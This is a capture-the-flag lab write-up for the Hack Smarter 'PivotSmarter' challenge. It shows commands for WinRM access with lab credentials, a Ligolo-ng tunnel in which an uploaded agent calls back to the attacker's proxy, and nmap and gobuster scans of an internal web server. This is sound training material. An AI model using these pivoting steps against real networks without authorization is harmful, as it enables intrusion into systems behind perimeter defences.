PivotSmarter

Challenge Lab (Basic) - by Tyler Ramsbey

Coursecourses.hacksmarter.org

The following post by 0xb0b is licensed under CC BY 4.0

Scope and Objectives

Objective:

You're a penetration tester on the Hack Smarter Red Team. During the engagement, you have discovered credentials for a web server but your attack machine does not have direct access to the server.

Goal:

You have already compromised a Windows Server providing you access to the internal network. Connect to this machine with evil-winrm. Use this Windows Server as a proxy to access the web server from your attack machine, submit the credentials, and retrieve the final flag.

Windows Server - Credentials

j.smith
HackSmarter123

Web Server - Credentials

t.ramsbey
HackSmarter123321123

Initial Setup

We connect to the vpn and test our connection.

Recon

Out of habit, we scan the Windows machine using Rustscan and see that port 5985, which we use for WinRM, is open. We also see that SMB 139/445 is open.

rustscan -a 10.1.153.144 -- -sC -sV

Shell as j.smith

We tested SMB with the provided credentials via NetExec and were able to connect.

nxc ws.lab -u j.smith -p 'HackSmarter123'

Next, we try to connect via evil-winrm.

evil-winrm -i ws.lab -u j.smith -p 'HackSmarter123'

We are now tasked to pivot and reach the web.app machine (in this case on 10.1.24.130). For this we use Ligolo-ng.

Ligolo-ng setup

For the subsequent phases, we use ligolo to relay traffic between the target machine and our attacker machine to make the internal reachable networks of the target machine accessible to our attacker machine.

Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).

First, we set up a TUN (network tunnel) interface called ligolo and configuring routes to forward traffic for specific IP ranges (240.0.0.1, 10.1.24.0/24) through the tunnel.

sudo ip tuntap add user root mode tun ligolo

sudo ip link set ligolo up

sudo ip route add 240.0.0.1 dev ligolo

sudo ip route add 10.1.24.0/24 dev ligolo

Next, we download the latest release of ligolo-ng.

Release Ligolo-ng v0.8.2 · nicocha30/ligolo-ngGitHub

On our attack machine, we start the proxy server.

./proxy -selfcert

Next, we upload and run the agent using evil-winrm to connect to our proxy.

upload agent.exe

./agent.exe -connect 10.200.0.243:11601 --ignore-cert

We get a message on our ligolo-ng proxy that an agent has joined. We use session to select the session and then start it. We are now able to access the internal service of ws.lab through 240.0.0.1 and be able to reach out to 10.1.24.0/24.

Access as t.ramsbey

We already know about the target web.app (10.1.24.139). We will now attempt to ping it, and we should be successful.

ping 10.1.24.130

Now, we scan for the ports using Nmap. Port 22 and 80 are open.

nmap 10.1.24.130

The webserver is a Apache/2.4.52 hosting a default page.

namp -sC -sV -p22,80 web.app

Nothing to see here yet.

We use gobuster to scan for directories and sites. We also include the extension .html. We'll find the login.html page.

gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u "http://web.app" -x html

We enter the provided credentials...

... and are able to retrieve the flag.

PreviousBankSmarter NextShareThePain

Last updated 2 months ago

Was this helpful?